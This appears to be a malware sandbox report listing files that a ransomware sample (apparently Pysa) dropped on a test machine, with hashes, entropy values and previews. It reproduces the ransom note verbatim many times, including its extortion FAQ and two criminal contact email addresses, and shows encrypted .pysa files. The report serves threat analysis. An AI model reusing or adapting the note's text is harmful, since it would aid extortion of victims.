                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2665
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArJ:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw
                  MD5:E70B9F07BFC5AFD9FA1531063C76B4FF
                  SHA1:EDC8D069D1876965882BD95CC2873AA412518C94
                  SHA-256:447D333B1A111F8E2C5A4622B9F51DC0D480A3AAE33767A4C708DC85B0A97D2F
                  SHA-512:C47502FE22653B9B7C420303A8DD751ED3B286FA465FDDFFE729DAFF6236906C490917882EC9DA4561D87555DBA5B5026AB1D9DF6EB0C7350A82BA5CD33924A4
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\IconCache.db.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):19456
                  Entropy (8bit):7.9050896878478
                  Encrypted:false
                  SSDEEP:384:jbTTB0GfAQI44Lf/WImTRp1tFs64TyF/n5kmWaLVD3wOz1qf9zwHlUqTkbTzoX:jP+GYQTVI2lNN5km/Ld3Npqf/VTzi
                  MD5:2F64548C4E1A376E3A6D8E614FC84516
                  SHA1:66FCE7D7C38BC4BFF071A61E4CECA46B8D8E5C0A
                  SHA-256:675BB0D6F0705ACAE2A83DCA9541385CEC4B56832CE370AF1558C832082C9623
                  SHA-512:98B6A0387E7597B2446EEB427034AA44AF9FF1654082D8B624AC4BBFA7DD67421869A612B14A202D8D25FC2A761AA4A3434A4C88171BB39A4A06FB21FBC63FAA
                  Malicious:false
                  Preview: .p#`>,3R..c\V.....L.Y.....|.....j.F..............4.K......)...H.........:P..]....~V....Cd.9dvI.4...pa..q$..N..........Z..\...)XCIM.pb;kJ...X......c..9..2.d...].Z.@. V..fs[....EH.&...D?j1.}..5..lq.....F{mA.Z.qJl.s5G..#....Pg#. ..-...e....f....x..}AP..#h..AQ.N...#....h.[. u.Xp.|_...'...gQ.Ob.'5...L..X..t~~...2.|.E...)b.....g......7...&.}^~b..lr....^&?9pk.$.R.&..Mo.~...7egsP.8.M....+..M...*-.H.l...=r5.X9.......Zj..0.........#.]..r....w..:..E.)R]B.....Lx.76?`..{.|N...t)H.H.5..X;k.T.W3\nO....._i...P.c.....a......Kc$...B...D.s.7.ie...W.si.P..f...u....Z...{;...G.)..........=...m.)Nd/.fE.._za.....u.Z.ENnM.b.F.xe.-b....eL...'.k..|. ..AF.3.}.......N...../1..'..A.@.N.r;...Np.1....@.....YQ...1.......[.n\....e.E....Z...o/.G.d..!.Q}0E...4H.6.G0W...#....V..s...ao.....4.HhF..>.;.....gX..`..z..2.....[M..}S.U."*...........o._.Y*...QS..A,.).......(.../...P..,...]-.a.*.Yr..d.?x.o./..}b....'...@........>..Pd.....,....6 M....vM/.0j..y.|w0.G...
                  C:\Users\user\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012020093020201001\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Microsoft\Windows\History\History.IE5\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Microsoft\Windows\History\Low\History.IE5\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Microsoft\Windows\History\Low\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2665
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArJ:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw
                  MD5:E70B9F07BFC5AFD9FA1531063C76B4FF
                  SHA1:EDC8D069D1876965882BD95CC2873AA412518C94
                  SHA-256:447D333B1A111F8E2C5A4622B9F51DC0D480A3AAE33767A4C708DC85B0A97D2F
                  SHA-512:C47502FE22653B9B7C420303A8DD751ED3B286FA465FDDFFE729DAFF6236906C490917882EC9DA4561D87555DBA5B5026AB1D9DF6EB0C7350A82BA5CD33924A4
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Microsoft\Windows\History\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2665
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArJ:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw
                  MD5:E70B9F07BFC5AFD9FA1531063C76B4FF
                  SHA1:EDC8D069D1876965882BD95CC2873AA412518C94
                  SHA-256:447D333B1A111F8E2C5A4622B9F51DC0D480A3AAE33767A4C708DC85B0A97D2F
                  SHA-512:C47502FE22653B9B7C420303A8DD751ED3B286FA465FDDFFE729DAFF6236906C490917882EC9DA4561D87555DBA5B5026AB1D9DF6EB0C7350A82BA5CD33924A4
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3731
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLF:e1bLg1bLg1bLg1bLg1bLg1bLg1bLF
                  MD5:5B9ED7078C8B9D5D8E79C442D1AF721A
                  SHA1:C346E1F25626A7E2F23E9B66AAC443EF463B43B1
                  SHA-256:924AD2EFD291DCFB30D1B6D8DB0907AFFF2456F24A986967AD49D125C95D5C8A
                  SHA-512:6DF4F238CC21D76516B0DE830B75964DC3BA81EB4BBC1C829C5BD06BBAA4E6FF9AD612CB7BD612F98A15451B3B495B40A58D4F872C137DA9BCBD76A4CF4BD874
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3198
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLF:e1bLg1bLg1bLg1bLg1bLg1bLF
                  MD5:41EDA9C2DCD2674BC24D22B41E6A8992
                  SHA1:4B2041AB96DA4C582177F737A7619E473F46EAE4
                  SHA-256:E4EFA6C273D5B853C6319269B3F7EB09FA47CBF159C1ADA970A464386F60F183
                  SHA-512:FAAB6B9EA2F7E6BCF9A8F96C498A025B68CAD9336BF20A54A3E9256FCAB6AD4164E57CE8F03ACAFF1B0E390A61ECFE975D0DD3A244D1819182E1FAAE5FE10690
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\MSIMGSIZ.DAT.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):50176
                  Entropy (8bit):7.98038749425723
                  Encrypted:false
                  SSDEEP:1536:tbYfI9a5HI6ZUYNLgTbsFAIqzdMPZsLjp:JWMae6ZvEdMPZsLN
                  MD5:9EEB080DF7D2C462772A574C76418D0C
                  SHA1:B073ABFC72B9A7AB8B9296F35528028329E40622
                  SHA-256:8E8F45E15EACF905271A1054AD2A6597D9688FADB1931864B877BAB609469FE9
                  SHA-512:BF2CA6566EBB68CE08FCFB61552F90C135B0123783BF83849FCB11946D4F1BE43584EAF36CE78A120541BD85F297E8A766347E47F6F496857ACCAFB83ED743AA
                  Malicious:false
                  Preview: .Oj.j.....Z.R...(.E3...}z..Mg.#..f...w..}EG.\.~..*:k.........]...|3.,_\f(^.T1...e..z..'..5.......JI....#&.z%.k.w..:[.J...`..q...Q.E.,F.B...(...t.J'.;...G46&..>...t.C{.......T..*n.kgLS..._.r:.).-...s.".-<...m....x..2.Jc...Q..&.I...0.....C4.wz^.!.O...b.Ax.....E.'A./.4M.."5/.J..)A!.IJ.V...........+_.B...up...H.eyM..n.........%_w.|...i....4.&..:5.[..Vc.2HQ...GW..a....|W3%.s.4y..vY....to.P.1l0.-......7..I.._.SEd*...%N>j.w{.uU.u.."..mC,.w..........(Q..X....`W..6. Hk".RJ....._......Q......3.g....*Kw"..K.9..2l.y..M..oa..O.......Q..Fd.D...$.Pm ..b.A....u._t..PWl..S............S......._Y.@.....M....P...M.D.../"...r>I. ..z.w.......F{..X..i..d..@...[..k....>'....|..8.1O0@.\.:...O.o..'....W..l.v.mK...it.j..H..g.C6+.).L..tS.R|[...sVg`l.)8.I.U...We.nD....9..!+VY.^. ..!4.`vG.....UN.'......7..S..+...~;...F...~..e...L&.Z.....8../.k...ZD.....|...k...H.$..K{"..g...jP.......g...*...}.=..h..}.=....m.C.m...Bu.%........bZ*T...U.?...9..4.m+hwPV...y...gq.G..lZ./
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\SmartScreenCache.dat.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.994922169433915
                  Encrypted:true
                  SSDEEP:1536:71nvKOV4c4lE2zgvVskYgAKMDMWXLy/UJIdY/JNc7Xs/CuboShAXcUSMb1dHFm3Q:NKx2CVRAWX+/U+dY/Ecboo8dHw3cya7
                  MD5:316CCF39796C9097B3BC6767F4ABD5B7
                  SHA1:04A67360896030365F8F699FAE42B7F6036BF63F
                  SHA-256:B4654798EDA338D1E7BA42D094E36F39C7E2F90C27EB826BDA4D5EC99395F19B
                  SHA-512:E605428F088CB326AE463F603EF70F4398E9871418825AE6E16337DB84EEE34859A7ABF1DCBB5DB61BC9643279A9521A8F157672B6F89F5F919CF7BEA3DA7D2E
                  Malicious:true
                  Preview: .=..G7..N....T....vi ..$..X...5.hT?..~.W...>...B...l..-@.....d..d..."....c.&.|+...h....B.......<..<.lV.%..........c$V.O.[..... ..bO8..I~a........+........B]....@t5Mf.Y... 3.OH..v...$.[.L~.Y...".'0z..I..wPn=&..0.wmD.)5..k.....I.;...g?.|..T1.).5li.DLj...e.F.z..xv.;].WMo..L....-A....}..t..":....*<iY ..0.KaJ..#swn.Q7....H.......l.g.K..B7.;Le.CB.a..`.....#5...!...).(.w.#..m.....c.+.cZ.9U.....B.5MU.".QB.k..O./j..vND.t.t.*1.o...o_.#3..\.o...7a+.......gP.....x......p..xX'\.......C.E.5.Mh...-.......4.../...s..gw.S>.`.\h..i..c.....y (j...u"C.....{CG...Yw....?..Y.........`t..G.....WJ"...r%_.....s.....=.B....q..~.....v!..F=...s......T.3.~......|0..L.M..@..Q..7...>......<Qg:..<...:.k..9.h.#."...W..q.Z....>............#.[......X....na..).9!8..e\..?;....}.....~.....@....y.[....|B.D...{G...\..07...W6.m..t.t.dnC.I%=Q/.D.V.).'.~.x.....0...?.M...7.I....f.).e.5.t.....".*..Cd$....B.b.....j..Nlv7.5.3R.e......-.R.._k%.J.r.vu..E....$av..y..[k.1..2..u..L...cF.g..
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Virtualized\C\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Virtualized\C\Users\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Virtualized\C\Users\user\AppData\Local\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
